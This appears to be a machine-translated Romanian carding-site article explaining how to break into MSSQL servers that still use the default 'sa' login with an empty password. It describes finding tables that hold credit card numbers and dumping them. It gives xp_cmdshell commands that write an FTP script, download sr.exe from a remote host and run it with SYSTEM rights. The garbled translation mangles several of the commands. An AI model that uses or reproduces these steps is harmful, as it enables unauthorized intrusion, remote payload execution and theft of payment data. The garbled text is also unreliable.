Cea mai ușoară cale de a intra în serverul SQL

După trei zile, după ce am vizitat narcologul și am luat un duș rece, procedăm, de fapt, la PROCES.

În acest moment, aveți deja o mulțime de mașini care sunt cunoscute că se execută MSSQL-server care ascultă pe portul standard, 1433. Nu știi care dintre aceste servere, au fost instalate administratori de abandon școlar, cum ar fi citiți acest articol cu interes și fără a avea grijă să schimbați login-ul standard SA cu o parolă EMPTY, pentru ceva mai decent.

Lansați QA, în fereastra pop-up, introduceți:

- SQL Server: IP din lista scanată cu SRA
- Caseta de selectare Start SQL dacă este oprită NU VENIT
- Conectați utilizând: autentificarea SQL Server
- Numele de conectare: sa
- Parola: câmp gol

În cazul mesajelor cum ar fi: Login logged for user "sa", conexiune nesigură a serverului SQL etc, faceți clic pe "OK" și încercați următoarea adresă IP din listă.

Ei bine, în cele din urmă, în loc de plictisitor Intra depuse, vom obține doar dintr-o dată deschis, alb curat, fereastra cu tipul titlul „Solicitare 12.11.32.45.master.sa“ - ați dus la SQL-server, felicitări =)

Faceți clic pe F8, lista de baze de date aflate pe acest server este afișată spre stânga. Vreau doar să avertizeze: baza de date master cu nume, model msdb, Northwind, pub-uri, tempdb sunt servicii sau livrate MSSQL ca un exemplu - ei văd nu are nici un sens - la fel de auto-educație.

Dacă vedeți ceva de genul ONLINESHOP (=) în lista de baze, faceți clic pe X din stânga numelui bazei de date, în lista derulantă - pe intersecția spre stânga tabelelor utilizator. Înainte de a lista tabelele bazei de date. Când faceți clic pe crucea din stânga numelui tabelului, veți primi o listă cu numele câmpurilor din tabel.

Din propria mea experiență de ucidere timp, pot vedea că marea majoritate a numelor de tabele și câmpuri poartă mai mult sens - în cazul în care baza de date are un număr de cărți, atunci cel mai probabil, acesta va fi scris CreditCardNumber - sau în numele tabelului sau în câmpul pentru nume tabelă.

1. În lista derulantă din partea de sus a ferestrei QA, selectați numele bazei de date dorite.
2. Corupem albul virgin al ferestrei de cerere cu literele de tip:

selectați top 100 * de la utilizatori

această interogare va întoarce primele 100 de rânduri din tabela USERS

selectați conta (*) de la utilizatori

această interogare va afișa numărul de rânduri din tabela USERS

cmd xp_cmdshell“/ c echo Administrator> ftp1cmd / c echo parola >> ftp1cmd / c echo binare >> ftp1cmd / c echo obține sr.exe >> ftp1cmd / c echo iesi >> ftp1cmd / c ftp -s: ftp1 -d 12.12 .12.12 '

această solicitare este descărcată de pe serverul FTP la data de 12.12.12.12 cu login Admin și parola de parolă sr.exe

xp_cmdshell 'cmd / c sr.exe'

iar această solicitare va rula sr.exe pe mașina de la distanță cu drepturile serverului SQL - care este, de obicei, fie SYSTEM, fie DomainAdmins.

Dacă cineva nu a ghicit, xp_cmdshell 'dir c: \' va afișa conținutul unității C: \.

Toate drepturile asupra articolului aparțin site-ului www.carderplanet.com.

Distribuiți acest articol cu ​​prietenii dvs.:

Articole similare

• Cele mai simple metode de conectare la bucla la sol, orbita-uniune

• 5 moduri simple de a spune ceva

• Pătură automată este o modalitate simplă de a menține motorul cald

Trimiteți-le prietenilor: